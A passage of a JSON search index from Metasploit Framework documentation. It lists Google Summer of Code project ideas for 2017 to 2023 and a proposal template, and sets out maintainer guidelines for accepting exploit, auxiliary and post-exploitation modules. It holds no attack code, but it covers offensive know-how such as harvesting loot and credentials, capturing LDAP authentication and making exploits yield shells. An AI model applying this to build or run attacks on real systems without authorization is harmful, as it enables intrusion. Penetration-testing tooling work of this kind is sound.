    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#payload-side"
  },"151": {
    "doc": "2017 Project Ideas",
    "title": "Metasploitable3",
    "content": "Metasploitable3 is an intentionally vulnerable virtual machine. It was created to be a learning tool for new users as well as a place to test Metasploit and its payloads. Linux: add vulnerabilities . Requirements: Vagrant . Windows: add vulnerabilities . Requirements: Vagrant . – . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#metasploitable3",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#metasploitable3"
  },"152": {
    "doc": "2017 Project Ideas",
    "title": "Miscellaneous",
    "content": "Replace msftidy with a real linter . Our current module style checker is a mass of regular expressions attempting to look for bad patterns. It could be much improved by using a real lexer. We could use rubocop as a base for this. This could also dovetail into an ongoing documentation project. Difficulty: 2/5 Requirements: Ruby . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#miscellaneous",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#miscellaneous"
  },"153": {
    "doc": "2017 Project Ideas",
    "title": "Potential Mentors",
    "content": "All of the following folks have expressed willingness to be mentors. | @busterb | @egypt | @hdm | @jhart-r7 | @jinq102030 | @mubix | @OJ | @sempervictus | @wvu | @zeroSteiner | . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#potential-mentors",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html#potential-mentors"
  },"154": {
    "doc": "2017 Project Ideas",
    "title": "2017 Project Ideas",
    "content": "GSoC Project Ideas in no particular order. When you’ve picked one, take a look at GSoC 2017 Student Proposal for how to make a proposal. Submit your own . If you want to suggest your own idea, please discuss it with us first on our mailing list to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project. – . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-project-ideas.html"
  },"155": {
    "doc": "2017 Student Proposal",
    "title": "Title",
    "content": "A brief description of what you would like to work on. See GSoC-2017-Project-Ideas for ideas. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#title",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#title"
  },"156": {
    "doc": "2017 Student Proposal",
    "title": "Vitals",
    "content": ". | Your name | Contact info - include at least: . | an email address | github user name | Freenode nick | . | . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#vitals",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#vitals"
  },"157": {
    "doc": "2017 Student Proposal",
    "title": "Skillz",
    "content": "What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well. What other projects have you worked on before? . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#skillz",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#skillz"
  },"158": {
    "doc": "2017 Student Proposal",
    "title": "Your project",
    "content": "Fill in the details. What exactly do you want to accomplish? . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#your-project",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html#your-project"
  },"159": {
    "doc": "2017 Student Proposal",
    "title": "2017 Student Proposal",
    "content": "Send the following to [email protected] . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2017-student-proposal.html"
  },"160": {
    "doc": "2018 Project Ideas",
    "title": "Enhance Metasploit Framework",
    "content": "Improving the Post-exploit / Meterpreter functionality . Examples could include: . | Sending keystrokes and mouse movement to a Meterpreter session | HTML based VNC style session control e.g. https://github.com/rapid7/metasploit-framework/pull/9196 but accepting user input from the browser | Playing (streaming?) sounds to a Meterpreter session | Implementing the streaming record mechanism from more Meterpreter sessions | Text-to-speech and volume control | Fun behaviors . | Ejecting the CD-ROM drive | Flipping the screen upside down | Changing screen colors | Turning the monitor on/off | Ordering donuts | . | MessageBox or live chat functionality (e.g. “This machine is vulnerable to MS17-010, you must run Windows Update!”) | Overlaying an image or even HTML on the user interface | . Difficulty: Varies . Improving post-exploit API to be more consistent, work smoothly across session types . The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, powershell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements: . | Shell sessions do not implement the filesystem API that Meterpreter sessions have | When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these. | Simple commands like ‘cmd_exec’ are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily. | . Difficulty: Varies . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#enhance-metasploit-framework",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#enhance-metasploit-framework"
  },"161": {
    "doc": "2018 Project Ideas",
    "title": "Add meta-shell commands",
    "content": "Shell sessions typically expose a direct connection to a remote shell, but are lacking a number of nice features such as the ability to stop a remote command, background a command (this could be advanced or depend on the underlying session), or to even lock the session. This project would implement some pre-processing hooks to shell sessions so that job control could be added by default (allowing backgrounding of commands), meta-commands like ‘background’ and ‘sessions’ could be added as well. Difficulty: 3/5 . Improve the web vulnerability API . This would follow up on the Arachni plugin PR https://github.com/rapid7/metasploit-framework/pull/8618 and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners. Difficulty: 4/5 . Session-style module interaction . Metasploit has the concept of ‘sessions’ where a connection context can define its own set of console operations. E.g. if you interact with a session, Metasploit switches to a specific subconsole for interaction. It would be nice as an alternative to ‘action’ for auxiliary modules, or as a way to merge related modules, to simply interact with the module. Difficulty: 3/5 . Integration plugin with a 3rd-party post-exploit framework . Connect a 3rd-party post-exploitation framework with Metasploit, such as Empire, Pupy, or Koadic, so that Metasploit can view and interact with sessions outside of its own types. Being able to use outside stagers in exploits, or adding the ability to ‘upgrade’ a session to an outside session type are other possibilities. Difficulty 3/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#add-meta-shell-commands",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#add-meta-shell-commands"
  },"162": {
    "doc": "2018 Project Ideas",
    "title": "Enhance Metasploitable3",
    "content": "Create a Simulated Active Directory Domain . Expand functionality of the existing Windows 2008 VM to act as a domain controller. The setup should include a number of users of varying roles, multiple group policy objects and settings, and logon scripts or application deployments. Considerations should be taken on how and where to include purposeful vulnerabilities within these settings. Difficulty 2/5 . Configure a Mock Corporate Network . Currently metasploitable3 consists of two separate virtual machines with all currently configured vulnerable services available with a simple network connection. This should be expanded to include a larger number of VMs with services spread across them to better simulate a real world environment. Considerations must be taken for deploying this on systems with varying hardware availability, or look into different cloud providers. Difficulty 4/5 . Add Monitoring Capabilities Between VMs . Metasploitable3 is already a playground from an attacker’s point of view, but how can we make it valuable from a defender’s perspective? Research various network monitoring and detection solutions and implement them across the mock network. Set up a new “NOC” VM for keeping track of activity and watching for intrusion. The goal is to make it fairly simple for anyone to set up a red team vs blue team mock environment. Difficulty 5/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#enhance-metasploitable3",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#enhance-metasploitable3"
  },"163": {
    "doc": "2018 Project Ideas",
    "title": "Goliath",
    "content": "Data Visualization . Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. Metasploit ‘Goliath’ Demo (msf-red) . Difficulty 3/5 . Elasticsearch Datastore . Write Goliath data to Elasticsearch. Explore data visualization using Kibana. Difficulty 3/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#goliath",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#goliath"
  },"164": {
    "doc": "2018 Project Ideas",
    "title": "Submit your own",
    "content": "If you want to suggest your own idea, please discuss it with us first on our mailing list to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#submit-your-own",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html#submit-your-own"
  },"165": {
    "doc": "2018 Project Ideas",
    "title": "2018 Project Ideas",
    "content": "GSoC Project Ideas in no particular order. Mentors: @busterb, @zerosteiner, @timwr, @asoto-r7, @jmartin-r7, @pbarry-r7, @mkienow-r7, @jbarnett-r7 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2018-project-ideas.html"
  },"166": {
    "doc": "2019 Project Ideas",
    "title": "2019 Project Ideas",
    "content": "TBD! . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2019-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2019-project-ideas.html"
  },"167": {
    "doc": "2020 Project Ideas",
    "title": "Enhance Metasploit Framework",
    "content": "Improving post-exploit API to be more consistent, work smoothly across session types . The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, powershell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements: . | Shell sessions do not implement the filesystem API that Meterpreter sessions have | When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these. | Simple commands like ‘cmd_exec’ are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily. | . Difficulty: Varies . Improve the web vulnerability API . This would follow up on the Arachni plugin PR https://github.com/rapid7/metasploit-framework/pull/8618 and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners. Difficulty: 4/5 . Session-style module interaction . Metasploit has the concept of ‘sessions’ where a connection context can define its own set of console operations. E.g. if you interact with a session, Metasploit switches to a specific subconsole for interaction. It would be nice as an alternative to ‘action’ for auxiliary modules, or as a way to merge related modules, to simply interact with the module. Difficulty: 3/5 . Enhance SQL Injection Support . Enable faster implementation of SQL injection based exploit modules by adding library support for common injection attack vectors. Currently very few SQL injection exploits are implemented for Metasploit, possibly due to the high complexity of building out injection queries and posting them to a vulnerable URI. Difficulty: 3/5 . Conditionally Exposed Options . 
The Metasploit Framework’s modules offer the core functionality of the project and these each use a set of datastore options for configuration. Many modules specify a particular system that they target or action that they provide. Modules should have (but currently lack) the ability to expose and hide options through the UI based on either the target or action that they take. This would allow module developers to create more flexible modules without sacrificing user experience by exposing options that are irrelevant based on the current configuration. Difficulty: 2/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html#enhance-metasploit-framework",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html#enhance-metasploit-framework"
  },"168": {
    "doc": "2020 Project Ideas",
    "title": "Goliath",
    "content": "Data Visualization . Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. Metasploit ‘Goliath’ Demo (msf-red) . Difficulty 3/5 . Elasticsearch Datastore . Write Goliath data to Elasticsearch. Explore data visualization using Kibana. Difficulty 3/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html#goliath",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html#goliath"
  },"169": {
    "doc": "2020 Project Ideas",
    "title": "Submit your own",
    "content": "If you want to suggest your own idea, please discuss it with us first on our mailing list to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html#submit-your-own",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html#submit-your-own"
  },"170": {
    "doc": "2020 Project Ideas",
    "title": "2020 Project Ideas",
    "content": "GSoC Project Ideas in no particular order. When you’ve picked one, take a look at How-to-Apply-to-GSoC for how to make a proposal. Mentors: @zerosteiner, @jmartin-r7 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2020-project-ideas.html"
  },"171": {
    "doc": "2021 Project Ideas",
    "title": "Enhance Metasploit Framework",
    "content": "Retain active status of authentication tokens . Many testing techniques interacting with web servers, such as XSS, rely on ensuring that authentication obtained on a target is kept active. A mechanism for registering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authentication tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts. Difficulty: 2/5 . Improving post-exploit API to be more consistent, work smoothly across session types . The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, PowerShell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements: . | Shell sessions do not implement the filesystem API that Meterpreter sessions have | When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these. | Simple commands like ‘cmd_exec’ are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily. | . Difficulty: Varies . Improve the web vulnerability API . This would follow up on the Arachni plugin PR https://github.com/rapid7/metasploit-framework/pull/8618 and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners. Difficulty: 4/5 . Data Visualization . 
Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. Metasploit ‘Goliath’ Demo (msf-red) . Difficulty 3/5 . Elasticsearch Datastore . Write Goliath data to Elasticsearch. Explore data visualization using Kibana. Difficulty 3/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2021-project-ideas.html#enhance-metasploit-framework",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2021-project-ideas.html#enhance-metasploit-framework"
  },"172": {
    "doc": "2021 Project Ideas",
    "title": "Submit your own",
    "content": "If you want to suggest your own idea, please discuss it with us first on our mailing list to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2021-project-ideas.html#submit-your-own",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2021-project-ideas.html#submit-your-own"
  },"173": {
    "doc": "2021 Project Ideas",
    "title": "2021 Project Ideas",
    "content": "GSoC Project Ideas in no particular order. When you’ve picked one, take a look at How-to-Apply-to-GSoC for how to make a proposal. Mentors: @zerosteiner, @jmartin-r7 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2021-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2021-project-ideas.html"
  },"174": {
    "doc": "2022 Project Ideas",
    "title": "Enhance Metasploit Framework",
    "content": "HTTP-Trace enabled login scanners . Current login scanners do not support the HTTP-Trace option; this option is currently exposed in the Exploit::Remote::HttpClient mixin and not available in login scanners. This functionality would aid module writers in debugging and testing initial module implementations as well as enable end users to provide more verbose details for error reports. Changes to enable this support will need careful validation and testing as a large number of modules would be potentially impacted by the revision. Size: Medium Difficulty: 3/5 . Rest API Pagination . Metasploit provides two API interaction services, a Rest API service and an RPC service. Previous efforts have wrapped and exposed the RPC service as JSON responses available from the Rest API endpoint. This wrapping did not account for possible large responses that may benefit from pagination. A previous contributor attempted to add this functionality for a limited set of RPC commands; however, review identified that the changes would introduce changes to the documented public API and also introduce inconsistency within the API responses, resulting in a fluctuating public API. Modern pagination would be beneficial to increasing user adoption of Rest API services provided it can be implemented consistently and either maintain compatibility with the existing public RPC service or generate a one-time migration across all exposed public APIs. Size: Large Difficulty: 4/5 . LDAP Capture Capabilities . Metasploit’s LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the 2021 Log4Shell vulnerability. Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. 
Support for various protocol-level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are SPNEGO and StartTLS support to enable compatibility with the widest variety of clients and a new capture module that logs authentication information from clients. Size: Medium Difficulty: 3/5 . Enhanced LDAP Query & Collection . When performing a security assessment on a network with centralized login such as LDAP or Active Directory, these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system, by utilizing tooling such as Sharphound or by leveraging SMB services via the secrets_dump module, these methods are somewhat indirect. A network-based capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory, providing capabilities similar to the existing requests plugin, could enable users to search for valuable information in these services without the need to compromise a target or interact with a secondary service. Size: Medium/Large (Depends on proposal) Difficulty: 3/5 . Improving post-exploit API to be more consistent, work smoothly across session types . The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, PowerShell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements: . | Shell sessions do not implement the filesystem API that Meterpreter sessions have | When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these. 
| Simple commands like ‘cmd_exec’ are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily. | . Size: Medium/Large (Depends on proposal) Difficulty: Varies . Improve the web vulnerability API . This would follow up on the Arachni plugin PR https://github.com/rapid7/metasploit-framework/pull/8618 and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners. Size: Large Difficulty: 4/5 . Data Visualization . Enhance the existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed. | See Metasploit ‘Goliath’ Demo (msf-red) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at Metasploit-Data-Service-Enhancements-(Goliath). | . Size: Medium/Large (Depends on proposal) Difficulty 3/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2022-project-ideas.html#enhance-metasploit-framework",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2022-project-ideas.html#enhance-metasploit-framework"
  },"175": {
    "doc": "2022 Project Ideas",
    "title": "Submit your own",
    "content": "If you want to suggest your own idea, please discuss it with us first on Slack in the #gsoc channel to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2022-project-ideas.html#submit-your-own",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2022-project-ideas.html#submit-your-own"
  },"176": {
    "doc": "2022 Project Ideas",
    "title": "2022 Project Ideas",
    "content": "GSoC Project Ideas in no particular order. When you’ve picked one, take a look at How-to-Apply-to-GSoC for how to make a proposal. Mentors: @zerosteiner, @jmartin-r7, @gwillcox-r7 . Slack Contacts: @zeroSteiner, @Op3n4M3, @gwillcox-r7 on Metasploit Slack . For any questions about these projects reach out on the Metasploit Slack in the #gsoc channel or DM one of the mentors using the Slack contacts listed above. Note that mentors may be busy so please don’t expect an immediate response, however we will endeavor to respond as soon as possible. If you’d prefer not to join Slack, you can also email msfdev [@] metasploit [dot] com and we will respond to your questions there if email is preferable. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2022-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2022-project-ideas.html"
  },"177": {
    "doc": "2023 Project Ideas",
    "title": "Enhance Metasploit Framework",
    "content": "Rest API Pagination . Metasploit provides two API interaction services, a Rest API service and an RPC service. Previous efforts have wrapped and exposed the RPC service as JSON responses available from the Rest API endpoint. This wrapping did not account for possible large responses that may benefit from pagination. A previous contributor attempted to add this functionality for a limited set of RPC commands; however, review identified that the changes would introduce changes to the documented public API and also introduce inconsistency within the API responses, resulting in a fluctuating public API. Modern pagination would be beneficial to increasing user adoption of Rest API services provided it can be implemented consistently and either maintain compatibility with the existing public RPC service or generate a one-time migration across all exposed public APIs. Size: Large Difficulty: 4/5 . LDAP Capture Capabilities . Metasploit’s LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the 2021 Log4Shell vulnerability. Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol-level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are SPNEGO and StartTLS support to enable compatibility with the widest variety of clients and a new capture module that logs authentication information from clients. Size: Medium Difficulty: 3/5 . Improving post-exploit API to be more consistent, work smoothly across session types . The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, PowerShell, mainframe, and other session types. 
However, there are areas where the implementation is not consistent, and could use improvements: . | Shell sessions do not implement the filesystem API that Meterpreter sessions have | When a shell session is in a different language, e.g. Windows in French, the post API does not find the expected output. Add localization support for these. | Simple commands like ‘cmd_exec’ are fast in Shell sessions but are relatively slow in Meterpreter sessions. Add an API to make Meterpreter run simple commands more easily. | . Size: Medium/Large (Depends on proposal) Difficulty: Varies . Improve the web vulnerability API . This would follow up on the Arachni plugin PR https://github.com/rapid7/metasploit-framework/pull/8618 and improve the Metasploit data model to better represent modern web vulnerabilities. This project would require knowledge of data models, types of modern web vulnerabilities, and experience with web app security scanners. Size: Large Difficulty: 4/5 . Data Visualization . Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed. See Metasploit ‘Goliath’ Demo (msf-red) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at Metasploit-Data-Service-Enhancements-(Goliath) . Size: Medium/Large (Depends on proposal) Difficulty 3/5 . ",
    "url": "/docs/development/google-summer-of-code/gsoc-2023-project-ideas.html#enhance-metasploit-framework",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2023-project-ideas.html#enhance-metasploit-framework"
  },"178": {
    "doc": "2023 Project Ideas",
    "title": "Submit your own",
    "content": "If you want to suggest your own idea, please discuss it with us first on Slack in the #gsoc channel to make sure it is a reasonable amount of work for a summer and that it fits the goals of the project. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2023-project-ideas.html#submit-your-own",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2023-project-ideas.html#submit-your-own"
  },"179": {
    "doc": "2023 Project Ideas",
    "title": "2023 Project Ideas",
    "content": "GSoC Project Ideas in no particular order. When you’ve picked one, take a look at How-to-Apply-to-GSoC for how to make a proposal. Mentors: @jmartin-r7 . Slack Contacts: @Op3n4M3 on Metasploit Slack . For any questions about these projects reach out on the Metasploit Slack in the #gsoc channel or DM one of the mentors using the Slack contacts listed above. Note that mentors may be busy so please don’t expect an immediate response, however we will endeavor to respond as soon as possible. If you’d prefer not to join Slack, you can also email msfdev [@] metasploit [dot] com and we will respond to your questions there if email is preferable. ",
    "url": "/docs/development/google-summer-of-code/gsoc-2023-project-ideas.html",
    "relUrl": "/docs/development/google-summer-of-code/gsoc-2023-project-ideas.html"
  },"180": {
    "doc": "Guidelines for Accepting Modules and Enhancements",
    "title": "Acceptance Guidelines",
    "content": "Contributions from the open source community are the soul of Metasploit, and we love evaluating and landing pull requests that add new Framework features and content. Metasploit Framework has many tens of thousands of users who rely on daily, consistent, and error-free updates. Because of this, Metasploit’s core developers have adopted a fairly high standard for pull requests that add new Framework functionality and Metasploit modules. In order to encourage open and transparent development, this document outlines some general guidelines for Metasploit contributors and developers. Adhering to these guidelines maximizes the chances that your work will be merged into the official Metasploit distribution packages. ",
    "url": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#acceptance-guidelines",
    "relUrl": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#acceptance-guidelines"
  },"181": {
    "doc": "Guidelines for Accepting Modules and Enhancements",
    "title": "Module Additions",
    "content": "Most open source community support for Metasploit comes in the form of Metasploit modules. The following should be considered for acceptance; note that these are guidelines and not categorical imperatives (“should”s, not “must”s), since there are always exceptions to the norm, especially when it comes to novel new attacks and techniques. Modules should pass msftidy.rb and adhere to the CONTRIBUTING.md guidelines. Both are distributed with Metasploit. See Style Tips for some information on how to take some of the headache out of whitespace issues. Modules should have a clear and obvious goal: Exploits should result in a shell. Post modules should result in privilege escalation or loot. Auxiliary modules are an “Everything else” category, but even they should be limited to a well-defined task (e.g., information gathering to enable an exploit or a post module). Modules should not launch other modules, given the complexity of setting multiple payloads. Such actions are usually automation tasks for an external UI. Denial of Service modules should be asymmetric and at least have some interesting feature. If it’s comparable to a synflood, it shouldn’t be included. If it’s comparable to Baliwicked, it should be included. Modules that straddle the line, such as slowloris, may be included with some justification. Modules should be able to function as expected with minimal configuration. Defaults should be sensible and usually correct. Modules should not depend on exact timing, uncontrollable heap states, system DLLs, etc. All memory addresses (i.e., a JMP ESP, or a ROP gadget) should be part of the metadata under ‘Targets’, and documented (what instructions it points to, and what DLL). If the exploit is against specific hardware (e.g., routers, PLCs, etc.), or against software that is not free (and no trial/demo available), please remember to submit a binary packet capture (pcap-formatted) along with the module that demonstrates the exploit actually works. 
Please don’t use the alphanum encoder as a way to avoid BadChar analysis. Modules which set the EncoderType field in the payload as a way to avoid doing real BadChar analysis will be rejected. These modules are nearly always unreliable in the real world. Exploit ranking definitions can be found on the Exploit Ranking page. Exploit modules should implement a check() function when this is trivial to do so. Versions exposed through banners or network protocols should always result in a check() routine when a patch is available that changes this version. If a module (auxiliary or post) obtains some sort of information from the victim machine, it should store that data using one (or more) of the following methods: . | store_loot(): Used to store both stolen files (both text and binary) and “screencaps” of commands such as a ps -ef and ifconfig. The file itself need not be of forensic-level integrity – they may be parsed by a post module to extract only the relevant information for a penetration tester. | report_auth_info(): Used to store working credentials that are immediately reusable by another module. For example, a module dumping the local SMB hashes would use this, as would a module which reads username:password combinations for a specific host and service. Specifically, merely “likely” usernames and passwords should use store_loot() instead. | report_vuln(): Auxiliary and post modules that exercise a particular vulnerability should report_vuln() upon success. Note that exploit modules automatically report_vuln() as part of opening a session (there is no need to call it explicitly). | report_note(): Modules should make an effort to avoid report_note() when one of the above methods would be a better fit, but there are often cases where “loot” or “cred” or “vuln” classifications are not immediately appropriate. report_note() calls should always set an OID-style dotted :type, such as domain.hosts, so other modules may easily find them in the database. | . 
Modules should take advantage of the normal Metasploit APIs. For example, they should not attempt to create their own TCP sockets or application protocols with native Ruby; they should mediate sockets through Rex and Rex::Proto methods instead. This ensures compatibility with the full set of Framework features, such as pivoting and proxy chaining. Web application attacks are generally uninteresting (SQLi, XSS, CSRF), unless the module can reliably result in a shell or exercise some kind of useful information leak. Even in that case, the module should “just work,” as above. Web application attacks should be limited only to popular, widely deployed applications. For example, a SQLi module against a popular CMS that results in a shell on the CMS machine would be welcome. A module that causes a private Facebook profile to become public would not (Facebook has exactly one deployed instance). Web application attacks should implement an HttpFingerprint constant. Modules should only list targets that you actually tested the exploit on. Avoid assuming it works on a specific system if it has never been tested on it. Comments above the target entry indicating additional information about a given target (language pack, patch level, etc) greatly assist other developers in creating additional targets and improving your module. Modules can exercise unpatched and undisclosed vulnerabilities. However, Rapid7 is happy to assist with the disclosure process by following the Rapid7 policy. This policy provides a fixed 90-day window from when the vendor is contacted until the exploit is released. All vulnerabilities found by Rapid7 staff follow this process. The submitter will receive full credit for the vulnerability and the resulting exploit module regardless of how disclosure is handled. ",
    "url": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions",
    "relUrl": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#module-additions"
  },"182": {
    "doc": "Guidelines for Accepting Modules and Enhancements",
    "title": "Framework Enhancements",
    "content": "Generally, new functionality to the Metasploit Framework should start life as a plugin. If the functionality becomes useful and popular, we can integrate it more closely, add RPC API exposure, and so on, but it should be well-tested by the community before then. Automating a series of discrete functions is generally /not/ the responsibility of the Framework. Automation should be accomplished through the API (see Metasploit Community/Pro, MSFGUI, etc). Past efforts with in-Framework automation prove this out. Components such as db_autopwn and browser_autopwn rarely did what users expected, and configuring these tools became a nightmare through increasingly complex sets of options and arguments. Automating the Framework is easy and should stay easy, but the automation itself should live in resource scripts and other external front-ends to the Framework itself. Console functionality should have a focus on exploit and security tool development, with the exploit developer as the typical user. End users should be pointed to an interface such as the Community Edition or MSFGUI and should not expect much in terms of user-friendliness from the console. The console should be considered a debug mode for Metasploit and as close to bare-metal functionality as possible. External tools, such as msfpayload and msfvenom, are designed to make exploit development easier and exercise specific techniques. We are happy to continue evaluating tools of this nature for inclusion in the Framework; these should be accompanied by documentation (!), how-to tutorials for quick start, and other helpful text. ",
    "url": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#framework-enhancements",
    "relUrl": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html#framework-enhancements"
  },"183": {
    "doc": "Guidelines for Accepting Modules and Enhancements",
    "title": "Guidelines for Accepting Modules and Enhancements",
    "content": " ",
    "url": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html",
    "relUrl": "/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html"
  },"184": {
    "doc": "Guidelines for Writing Modules with SMB",
    "title": "SMB Protocol Overview",
